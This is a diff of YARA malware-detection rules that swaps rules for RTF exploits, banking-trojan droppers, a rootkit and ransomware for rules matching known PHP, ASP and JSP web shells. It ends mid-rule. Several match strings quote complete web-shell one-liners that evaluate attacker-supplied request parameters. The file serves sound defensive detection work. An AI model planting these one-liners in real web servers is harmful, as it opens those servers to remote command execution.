+		logic_hash = "2a85301f1d6e4c457ff0a1b2a08eb6f054905993a0667087f37b9a7352e38911"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 89 05 ?? ?? ?? ?? 81 2d ?? ?? ?? ?? 01 00 00 00 81 3D ?? ?? ?? ?? 00 00 00 00 }
+		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+		$s9 = "Variable Name</B></font></p>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them and filesize < 1000KB
+		all of them
 }
-rule SIGNATURE_BASE_Malrtf_Ole2Link : EXPLOIT FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice_2
 {
 	meta:
-		description = "Detects weaponized RTF documents with OLE2Link exploit"
-		author = "@h3x2b <tracker _AT h3x.eu>"
-		id = "5080e79a-3abc-5fc3-902e-b362f20510f9"
-		date = "2023-12-05"
-		modified = "2023-12-05"
+		description = "Web Shell - file ice.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_rtf_ole2link.yar#L1-L23"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L465-L478"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7ef764a0006b81c2b50699aa1fccb35c7c7da982cb8d56e02097114468e298f"
-		score = 75
+		hash = "1d6335247f58e0a5b03e17977888f5f2"
+		logic_hash = "57c3c369abd826d676290300d8df2d890b777fa1f0e1156654062159a4228db7"
+		score = 70
 		quality = 85
-		tags = "EXPLOIT, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rtf_olelink_01 = "\\objdata" nocase
-		$rtf_olelink_02 = "4f4c45324c696e6b" nocase
-		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase
-		$rtf_payload_01 = "68007400740070003a002f002f00" nocase
-		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase
-		$rtf_payload_03 = "6600740070003a002f002f00" nocase
+		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of ( $rtf_olelink_* ) and any of ( $rtf_payload_* )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_JS_Efile_Apr23_1
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Mdb
 {
 	meta:
-		description = "Detects JavaScript malware used in eFile compromise"
-		author = "Florian Roth"
-		id = "ba7a8b2c-789c-5bc5-be53-f2b92c7039e1"
-		date = "2023-04-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/Ax_Sharma/status/1643178696084271104/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_efile_apr23.yar#L2-L15"
+		description = "Web Shell - file mdb.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L479-L492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d94162e5719b92d9df349e7d48cd70e218998b0e120870a435a8073fa49c532"
-		score = 75
+		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+		logic_hash = "89f7692acd754992f9379b9b4661a01d6ab95cb85a3c2699928aa5ed3a3ac8c5"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "let payload_chrome = "
-		$s2 = "else if (agent.indexOf(\"firefox"
+		$s1 = "<% execute request(\"ice\")%>a " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_MAL_PHP_Efile_Apr23_1
+rule SIGNATURE_BASE_Webshell_Jsp_Guige
 {
 	meta:
-		description = "Detects malware "
-		author = "Florian Roth"
-		id = "d663b38e-b082-5cf7-9853-f4685bf3a87b"
-		date = "2023-04-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1642988428080865281?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_efile_apr23.yar#L18-L32"
+		description = "Web Shell - file guige.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L493-L506"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec4ac3f5c19f506a70eacb5fe3173cc06bf20567bbc9a96f3b269910382e5fa2"
-		score = 75
+		hash = "2c9f2dafa06332957127e2c713aacdd2"
+		logic_hash = "9d71095b5c709dfdd8b5fcebcaa4493d9c93e841e85cda2e2255e0c15ea83659"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "mt_rand( 0, 0xffff ), mt_rand( 0, 0xffff )" ascii
-		$s2 = "C:\\\\ProgramData\\\\Browsers" ascii fullword
-		$s3 = "curl_https($api_url." ascii
+		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Furtim_Nativedll : FILE
+rule SIGNATURE_BASE_Webshell_Phpspy2010
 {
 	meta:
-		description = "Detects Furtim malware - file native.dll"
+		description = "Web Shell - file phpspy2010.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4639b637-55d3-5591-9278-5a21de23ac72"
-		date = "2016-06-13"
-		modified = "2023-12-05"
-		reference = "MISP 3971"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_furtim.yar#L8-L25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L507-L522"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9673cdd1e8e38f98b9625291a03011d5cfce78c689eab491ff189c4e039e1ef"
-		score = 75
+		hash = "14ae0e4f5349924a5047fed9f3b105c5"
+		logic_hash = "b3acef196b30cf9afe24c81860bedff69fc5652c514aa36aba85d16b12bcc432"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
 
 	strings:
-		$s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
-		$op0 = { e0 b3 42 00 c7 84 24 ac }
-		$op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 }
-		$op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 }
+		$s3 = "eval(gzinflate(base64_decode("
+		$s5 = "//angel" fullword
+		$s8 = "$admin['cookiedomain'] = '';" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and $s1 or all of ( $op* )
+		all of them
 }
-rule SIGNATURE_BASE_Furtim_Parent_1 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ice
 {
 	meta:
-		description = "Detects Furtim Parent Malware"
+		description = "Web Shell - file ice.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a47719d2-1e4f-50a9-b340-55e13f5a24d5"
-		date = "2016-07-16"
-		modified = "2023-12-05"
-		reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_furtim.yar#L34-L57"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L523-L536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab4c7ca5c887b2a2f2949a5a6fd0d623dad47d9c1f866fb43f7f8ec38dfa6a02"
-		score = 75
+		hash = "d141e011a92f48da72728c35f1934a2b"
+		logic_hash = "524419e802d3cb6ac310565af22ec28044984aa4b1b2ee1cfbd292afd071709c"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
 
 	strings:
-		$x1 = "dqrChZonUF" fullword ascii
-		$s1 = "Egistec" fullword wide
-		$s2 = "Copyright (C) 2016" fullword wide
-		$op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
-		$op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
-		$op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
+		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ( $s* ) and all of ( $op* ) ) ) ) or all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_CRIME_Suspicious_Hex_String_Jun21_1 : CRIME PE FILE
+rule SIGNATURE_BASE_Webshell_Drag_System
 {
 	meta:
-		description = "Triggers on parts of a big hex string available in lots of crime'ish PE files."
-		author = "Nils Kuhnert"
-		id = "2ad208fa-c7a5-5df9-96fe-4a84dc770f0f"
-		date = "2021-06-04"
-		modified = "2023-12-05"
+		description = "Web Shell - file system.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L1-L16"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L537-L550"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73144b14f3aa1a1d82df7710fa47049426bfbddeef75e85c8a0a559ad6ed05a3"
-		score = 65
+		hash = "15ae237cf395fb24cf12bff141fb3f7c"
+		logic_hash = "8ea8d9d64521f47f1396e4f4d6c8f4a71fa1a643799ec408e1d2e0f255dc4996"
+		score = 70
 		quality = 85
-		tags = "CRIME, PE, FILE"
-		hash1 = "37d60eb2daea90a9ba275e16115848c95e6ad87d20e4a94ab21bd5c5875a0a34"
-		hash2 = "3380c8c56d1216fe112cbc8f1d329b59e2cd2944575fe403df5e5108ca21fc69"
-		hash3 = "cd283d89b1b5e9d2875987025009b5cf6b137e3441d06712f49e22e963e39888"
-		hash4 = "404efa6fb5a24cd8f1e88e71a1d89da0aca395f82d8251e7fe7df625cd8e80aa"
-		hash5 = "479bf3fb8cff50a5de3d3742ab4b485b563b8faf171583b1015f80522ff4853e"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "07032114130C0812141104170C0412147F6A6A0C041F321104130C0412141104030C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141122130C0412146423272A711221112B1C042734170408622513143D20262B0F323038692B312003271C170B3A2F286623340610241F001729210579223202642200087C071C17742417020620141462060F12141104130C0412141214001C0412011100160C0C002D2412130C0412141104130C04121A11041324001F140122130C0134171" ascii
+		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_CRIME_Unknown_LNK_Jun21_1 : LNK POWERSHELL FILE
+rule SIGNATURE_BASE_Webshell_Darkblade1_3_Asp_Indexx
 {
 	meta:
-		description = "Triggers on malicious link files which calls powershell with an obfuscated payload and downloads an HTA file."
-		author = "Nils Kuhnert"
-		id = "d1aac420-fd91-5577-8efd-fcdd7f733981"
-		date = "2021-06-04"
-		modified = "2023-12-05"
+		description = "Web Shell - file indexx.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L18-L33"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L551-L564"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "460e764cbd9fbfa1a2156059d0042a0bea5a939d501050a733a789d236015d37"
-		score = 75
+		hash = "b7f46693648f534c2ca78e3f21685707"
+		logic_hash = "57cfe09d53d42ee9d909a3894b8a3362209c1972c7d96ae5fdc61681c2998a89"
+		score = 70
 		quality = 85
-		tags = "LNK, POWERSHELL, FILE"
-		hash1 = "8fc7f25da954adcb8f91d5b0e1967e4a90ca132b280aa6ae73e150b55d301942"
-		hash2 = "f5da192f4e4dfb6b728aee1821d10bec6d68fb21266ce32b688e8cae7898a522"
-		hash3 = "183a9b3c04d16a1822c788d7a6e78943790ee2cdeea12a38e540281091316e45"
-		hash4 = "a38c6aa3e1c429a27226519b38f39f03b0b1b9d75fd43cd7e067c5e542967afe"
-		hash5 = "455f7b6b975fb8f7afc6295ec40dae5696f5063d1651f3b2477f10976a3b67b2"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
+		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
 
 	condition:
-		uint16( 0 ) == 0x004c and all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_CRIME_Unknown_ISO_Jun21_1 : ISO POWERSHELL LNK FILE
+rule SIGNATURE_BASE_Webshell_Phpshell3
 {
 	meta:
-		description = "Triggers on ISO files that mimick NOBELIUM TTPs, but uses LNK files that call powershell instead."
-		author = "Nils Kuhnert"
-		id = "73a1fc44-45c4-5253-b81d-fa6686dc0644"
-		date = "2021-06-04"
-		modified = "2023-12-05"
+		description = "Web Shell - file phpshell3.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L35-L50"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L565-L580"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49b61f498d3f4ee249d9687277e581a39e08ebb4e1a293170058fb5f770bde1f"
-		score = 75
+		hash = "76117b2ee4a7ac06832d50b2d04070b8"
+		logic_hash = "868b1b69fab3ec6fcfa15557075f313f4af0ec9cd15f41bb9dcc9bc26fc17f93"
+		score = 70
 		quality = 85
-		tags = "ISO, POWERSHELL, LNK, FILE"
-		hash1 = "425dbed047dd2ce760d0848ebf7ad04b1ca360f111d557fc7bf657ae89f86d36"
-		hash2 = "f6944b6bca627e219d9c5065f214f95eb2226897a3b823b645d0fd78c281b149"
-		hash3 = "14d70a8bdd64e9a936c2dc9caa6d4506794505e0e3870e3a25d9d59bcafb046e"
-		hash4 = "9b2ca8eb6db34b07647a74171a5ff4c0a2ca8000da9876ed2db6361958c5c080"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
-		$magic = "CD001" ascii
+		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
 
 	condition:
-		filesize < 5MB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Fake_Document_Software_Indicators_Nov23 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Hsxa
 {
 	meta:
-		description = "Detects indicators of fake document/image utility software that acts as a downloader for additional malware"
-		author = "Jonathan Peters"
-		id = "231474cd-1ec9-5738-bf48-ef707689056d"
-		date = "2023-11-13"
-		modified = "2024-04-24"
-		reference = "https://nochlab.blogspot.com/2023/09/net-in-javascript-fake-pdf-converter.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_fake_document_software.yar#L1-L20"
+		description = "Web Shell - file hsxa.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L581-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5f0a088bf672559fbac90313768d41b79be7f1f56c6ddb36f0dcd265a07f98b2"
-		score = 80
+		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+		logic_hash = "7f79b66d87f638bc09ee576de4dc4a8c5b1da7c406d318eeff7a4221c35d2313"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "ac5356ae011effb9d401bf428c92a48cf82c9b61f4c24a29a9718e3379f90f1d"
-		hash2 = "d1c29c2243c511ca3264ad568a6be62f374e104b903eca93debce6691e1c5007"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "tweakscode.com" wide
-		$ = "www.createmygif.com" wide
-		$ = "www.videownload.com" wide
-		$ = "www.pdfconverterz.com" wide
-		$ = "www.pdfconvertercompare.com" wide
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Linadoor_Rootkit_May22 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Utils
 {
 	meta:
-		description = "Detects LinaDoor Linux Rootkit"
-		author = "Florian Roth"
-		id = "e2f250b4-9a8a-5d70-83d7-5d12ad3763fb"
-		date = "2022-05-19"
-		modified = "2023-05-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_linadoor_rootkit.yar#L2-L37"
+		description = "Web Shell - file utils.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L595-L609"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "546c34d4c204c7266884bb3b5b6ada418e83029ab88f72e5ffb094f50d9ed28e"
-		score = 85
+		hash = "9827ba2e8329075358b8e8a53e20d545"
+		logic_hash = "90a5b64e59306bdffc5a89f5d86a2dc7a17669021d863e2a5ecea13d65c19053"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "25ff1efe36eb15f8e19411886217d4c9ec30b42dca072b1bf22f041a04049cd9"
-		hash2 = "4792e22d4c9996af1cb58ed54fee921a7a9fdd19f7a5e7f268b6793cdd1ab4e7"
-		hash3 = "9067230a0be61347c0cf5c676580fc4f7c8580fc87c932078ad0c3f425300fb7"
-		hash4 = "940b79dc25d1988dabd643e879d18e5e47e25d0bb61c1f382f9c7a6c545bfcff"
-		hash5 = "a1df5b7e4181c8c1c39de976bbf6601a91cde23134deda25703bc6d9cb499044"
-		hash6 = "c4eea99658cd82d48aaddaec4781ce0c893de42b33376b6c60a949008a3efb27"
-		hash7 = "c5651add0c7db3bbfe0bbffe4eafe9cd5aa254d99be7e3404a2054d6e07d20e7"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/dev/net/.../rootkit_/" ascii
-		$s2 = "did_exec" ascii fullword
-		$s3 = "rh_reserved_tp_target" ascii fullword
-		$s4 = "HIDDEN_SERVICES" ascii fullword
-		$s5 = "bypass_udp_ports" ascii fullword
-		$s6 = "DoBypassIP" ascii fullword
-		$op1 = { 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 }
-		$op2 = { e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b }
-		$op3 = { 48 89 c3 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 }
-		$op4 = { 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b 41 5c 41 5d }
-		$fp1 = "/wgsyncdaemon.pid"
+		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 2000KB and 2 of them and not 1 of ( $fp* ) or 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_KINS_Dropper
+rule SIGNATURE_BASE_Webshell_Asp_01
 {
 	meta:
-		description = "Match protocol, process injects and windows exploit present in KINS dropper"
-		author = "AlienVault Labs aortega@alienvault.com"
-		id = "17e12685-aaad-5d83-949c-43d5aef1ef0d"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/arPhm3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kins_dropper.yar#L1-L26"
+		description = "Web Shell - file 01.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L610-L623"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cdab93f823e13e0c3104de8e05cb1572f83fb5294f359698092d73fc7983955b"
-		score = 75
+		hash = "61a687b0bea0ef97224c7bd2df118b87"
+		logic_hash = "e057800013a9a8f4c3ecbe4e27c14e904700548e6ad9dc1f00313c7a3de7fd2d"
+		score = 50
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$n1 = "tid=%d&ta=%s-%x" fullword
-		$n2 = "fid=%d" fullword
-		$n3 = "%[^.].%[^(](%[^)])" fullword
-		$i0 = "%s [%s %d] 77 %s"
-		$i01 = "Global\\%s%x"
-		$i1 = "Inject::InjectProcessByName()"
-		$i2 = "Inject::CopyImageToProcess()"
-		$i3 = "Inject::InjectProcess()"
-		$i4 = "Inject::InjectImageToProcess()"
-		$i5 = "Drop::InjectStartThread()"
-		$uac1 = "ExploitMS10_092"
-		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
-		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+		$s0 = "<%eval request(\"pass\")%>" fullword
 
 	condition:
-		2 of ( $n* ) and 2 of ( $i* ) and 2 of ( $uac* )
+		all of them
 }
-rule SIGNATURE_BASE_KINS_DLL_Zeus
+rule SIGNATURE_BASE_Webshell_Asp_404
 {
 	meta:
-		description = "Match default bot in KINS leaked dropper, Zeus"
-		author = "AlienVault Labs aortega@alienvault.com"
-		id = "968ada06-c8a1-5053-95de-10aa484231cb"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/arPhm3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kins_dropper.yar#L28-L48"
+		description = "Web Shell - file 404.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L624-L637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd1ebe7976d1f93856b4f8d1d62d8fff68ce6234204da9fbdc233ddbef56864d"
-		score = 75
-		quality = 60
+		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+		logic_hash = "3db951af36ed3d08bc10b4c3fc2e67481f005580fb76f66b6ec5789ed6e2efdb"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$n1 = "%BOTID%" fullword
-		$n2 = "%opensocks%" fullword
-		$n3 = "%openvnc%" fullword
-		$n4 = /Global\\(s|v)_ev/ fullword
-		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
-		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
-		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
-		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
-		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
 
 	condition:
-		all of ( $n* ) and 1 of ( $s* )
+		all of them
 }
-
-rule SIGNATURE_BASE_MAL_RANSOM_Venus_Nov22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshell_Cnseay02_1
 {
 	meta:
-		description = "Detects Venus Ransomware samples"
+		description = "Web Shell - file webshell-cnseay02-1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f7e0ca4-c5e2-5557-92de-2e0d73035f12"
-		date = "2022-11-16"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/dyngnosis/status/1592588860168421376"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_venus.yar#L3-L38"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L638-L651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c94d59015897f180ef55608a2761b37c7b52193e28895ea6a4c0548acf3ad34"
-		score = 85
+		hash = "95fc76081a42c4f26912826cb1bd24b1"
+		logic_hash = "9950fb7c26dfb25665093dbcf5c4a9dcf65466783509a3caa11c2c96d177d855"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "46f9cbc3795d6be0edd49a2c43efe6e610b82741755c5076a89eeccaf98ee834"
